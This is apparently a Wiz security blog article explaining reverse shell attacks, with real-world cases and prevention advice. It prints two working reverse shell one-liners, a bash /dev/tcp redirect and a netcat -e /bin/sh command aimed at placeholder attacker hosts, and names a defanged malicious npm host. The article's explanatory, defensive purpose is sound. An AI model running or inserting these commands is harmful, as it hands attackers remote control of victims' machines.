What is reverse shell?
A reverse shell attack is a type of cyberattack where a threat actor establishes a connection from a target machine (the victim's) to their machine. Reverse shell attacks are often executed via TCP and, in rare cases, ICMP or UDP. The goal of a reverse shell attack is to provide the attacker with unauthorized remote access to redirect outgoing connections from the network of the remote host (the victim).
With control of a victim’s machine and communications, the attacker can steal or modify data, inject malware, or further escalate their access within the victim's network. The stakes are high: Public disclosure of the attack can lead to loss of customer trust, negative media attention, diminished brand reputation, regulatory fines, and revenue loss.
Let’s explore reverse shell attacks in greater detail and then discuss proactive measures you can take to protect your organization.
Free Cloud Risk Assessment
Connect with a Wiz expert for a personal walkthrough of the critical risks in each layer of your environment.
Request My Assessment
How does reverse shell work?
Reverse shell attacks exploit command injection vulnerabilities. They occur in three phases: connection initiation, reverse shell, and command injection. Here’s how it works:
Attackers compromise target systems by remote code execution that exploits system vulnerabilities—e.g., port forwarding and open ports. Because firewall rules are easier to bypass on open ports, attackers can gain access through ports such as port 80 or 443, which are often open by default.
Next, attackers deploy a payload that establishes a connection from the victim's machine to a remote machine. The attacker’s remote systems listen and accept the request, allowing them administrative access to exploit victims’ systems. Since the connection is outgoing, security mechanisms that detect only incoming connections can be bypassed. (This is an important difference between reverse shell and bind shell. Unlike reverse shell, bind shell may be easier to discover, as the connection is initiated by the attacker's system.)
To maintain persistent access, attackers bypass network filtering through port forwarding. Attackers may also use proxy servers or tunneling techniques to obscure the origin of their connection. To conceal malicious communication, attackers use encryption, but this adds an extra handshake to the process, which makes it even harder to detect the communication flow.
What is an Attack Surface?
An attack surface is refers to all the potential entry points an attacker could exploit to gain unauthorized access to a system, network, or data.
Read more
Examples of reverse shell
Read on for examples of reverse shell methods and how they are executed:
Bash reverse shell: Bash reverse shell is a Unix shell that is carried out using a simple one-line command. For example:
```bash
bash -i >& /dev/tcp/attackers_ip/attackers_port 0>&1
```In this command, /dev/tcp/attackers_ip/attackers_port represents the IP address and port number the reverse shell will connect to.
Java reverse shell: Java reverse shells are implemented using libraries such as java.net.Socket. This attack involves establishing a socket connection to the threat actor's server to enable remote command execution.
Netcat reverse shell: An example of a Netcat reverse shell is
```bash
nc -e /bin/sh attackers_ip attackers_port
```In this command, Netcat executes a shell connection to the specified IP address and port to establish a reverse shell.
Perl reverse shell: The IO::Socket module is commonly used to initiate a Perl reverse shell connection, enabling bidirectional communication between victims’ and attackers’ systems.
PHP reverse shell: For PHP reverse shells, the attacker uses PHP's socket functions (open and exec) to open a connection from a victim’s system to their system. The threat actor then executes commands to redirect communication to their system.
Python reverse shell: Python provides robust networking capabilities, making it well-suited to creating reverse shell connections. A Python reverse shell involves using the “socket” library to create a socket connection.
Ruby reverse shell: A Ruby reverse shell attack involves creating a socket connection to the attacker's server and establishing bidirectional communication for executing commands in a victim's system.
PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer
PyLoose is a newly discovered Python-based fileless malware targeting cloud workloads. Get a breakdown of how the attack unfolds and the steps to mitigate it.
Read more
Real-world examples of reverse shell
In most cases, hackers successfully execute reverse shell attacks because target systems are vulnerable. This is often worse in supply-chain attacks due to the large number of unsuspecting enterprises depending on cloud service providers. To execute such large-scale attacks, hackers release malicious packages, which, once installed, trigger the victims’ machines to establish reverse shell connections to the attackers’ machines. The packages may be disguised as software updates or other harmless-seaming packages.
Let’s consider three real-life scenarios:
1. #BrokenSesame vulnerability in Alibaba PostgreSQL databases
The Wiz Research team secured backdoor access to two Alibaba cloud PostgreSQL databases: ApsaraDB RDS and AnalyticDB. The backdoor was a container vulnerability, #BrokenSesame, caused by inadequate container isolation and an accidental “write” permission to a private registry.
This access could have allowed threat actors to compromise the Alibaba supply chain, execute “write” operations on customers’ registries, and release reverse shell packages disguised as software updates.
2. Hell's Keychain vulnerability in IBM Cloud PostgreSQL databases
The Wiz Research team leveraged a privilege escalation vulnerability named "Hell's Keychain" in IBM’s Cloud PostgreSQL database to uncover a set of vulnerabilities that could have allowed attackers to read and modify the data stored in IBM’s PostgreSQL databases.
The vulnerabilities include the Kubernetes service account token, the private container registry password, CI/CD server credentials, and overly permissive network access to internal build servers. If exploited, they would have exposed IBM customers to supply-chain attacks. (If this sounds familiar, it’s because this is similar to the ExtraReplica vulnerability, where Wiz researchers gained superuser privileges in a Azure PostgreSQL database.)
Hell’s Keychain: Supply-chain vulnerability in IBM Cloud Databases for PostgreSQL allows potential unauthorized database access
How IBM Cloud caught us exploring its infrastructure and how a hardcoded secret eventually led to build artifact access and manipulation
Read more
3. npm reverse shell vulnerability
In October 2023, a group of security researchers discovered 48 malicious package.json files published by an npm user. The packages were disguised as legitimate files with innocuous names and were equipped with install hooks that trigger reverse shell commands to rsh.51pwn[.]com once the packages are installed.
After installation, a new process is automatically created (independent of the parent process, to avoid detection). The process runs the Java reverse shell script "scripts/rsh.js" in a detached mode and uses filterNet to discover IPv4 addresses that can be used to initiate a reverse shell connection through the compromised host system. The moment the reverse shell connection is established, the hacker (identified as hktalent) can potentially access the compromised organization’s systems, networks, and sensitive data.
Reverse shell attack prevention and detection tips
Here are eight strategies to tackle reverse shell attacks:
1. Complete regular security audits
Using automated AI-based tools, conduct regular vulnerability scanning and penetration testing to uncover potential entry points and misconfigurations. When you simulate real-world attacks, you can measure the effectiveness of your security investments.
2. Prioritize dependency management
Beware of software dependencies containing malicious code. Choose dependencies from carefully maintained repositories only, and verify software package names. Use AI-powered software composition analysis (SCA) tools to scan open-source packages before installation. The tool you choose must empower you to scan dependencies swiftly, identifying vulnerabilities in both installed and yet-to-be-installed software. It should also rank the vulnerabilities in order of priority.
3. Implement regular patch management
Keep your apps up to date with the latest security patches to apply fixes for known vulnerabilities that could be exploited to establish reverse shell connections. Staying updated also reduces your attack surface.
Patch Management Explained
Patch management is the process of planning, testing, and applying updates to software systems and applications to address vulnerabilities, fix bugs, and improve overall system performance.
Read more
4. Focus on host-based and container security practices
Implement host-based security measures—including proper configuration management, least-privilege access control, and secure containerization. Container security keeps malicious actors from scraping container registries and isolates containers from one another to prevent lateral movement.
The Container Security Best Practices Cheat Sheet
What's included in this 9-page cheat sheet? 1. Actionable best practice w/code examples + diagrams. 2. List of the top open-source tools for each best practice 3. Environment-specific best practices
Download Cheat Sheet
5. Maintain stringent access and network control
Enforce the principle of least privilege to ensure that users and apps have only the necessary access to perform specific tasks. As discovered in the Alibaba hack above, over-privileged accounts empower attackers to escalate their access. Utilize network segmentation to limit unauthorized communications and lateral movement within your network.
6. Leverage log monitoring and behavioral analysis
By actively monitoring system logs, including network traffic logs and command execution logs, you can detect suspicious activities and respond proactively. A centralized log monitoring tool backed by behavioral analysis technologies will help you analyze user and system behaviors to identify deviations from normal patterns.
7. Use firewalls and IDSes
Utilize advanced firewalls with eBPF functionalities. Unlike basic firewalls that control only incoming network traffic, eBPF configures your firewalls to manage outgoing traffic and detect reverse shell attacks. Additionally, implement an intrusion detection system (IDS) to complement firewalls. IDSes detect and alert on anomalous activities, such as unexpected outbound connections or unusual traffic patterns.
8. Employee education
Employee training helps increase awareness of cybersecurity threats, including social engineering tactics that may lead to reverse shell attacks. Encourage your employees to adopt secure practices, such as only clicking on verified links and leaving suspicious emails unread. Teach teams to recognize suspicious activities and report potential incidents (e.g, unauthorized access or data breaches).
Risk-Based Vulnerability Management
Risk-based vulnerability management is a vulnerability management approach that prioritizes vulnerabilities that pose the greatest risk to an organization.
Read more
Conclusion
Reverse shell attacks can have devastating consequences, but you can protect your organization. Prioritize defense against reverse shell attacks by investing in security solutions that implement the tips we’ve discussed in this article.
Enter Wiz. With our advanced threat detection capabilities and comprehensive defense-in-depth strategy against reverse shell attacks, Wiz is your ideal solution. Request a demo today to gain real-time visibility into your cloud environments and detect and resolve any indicators of reverse shell attacks.
Learn why CISOs at the fastest growing companies choose Wiz to secure their cloud environments.
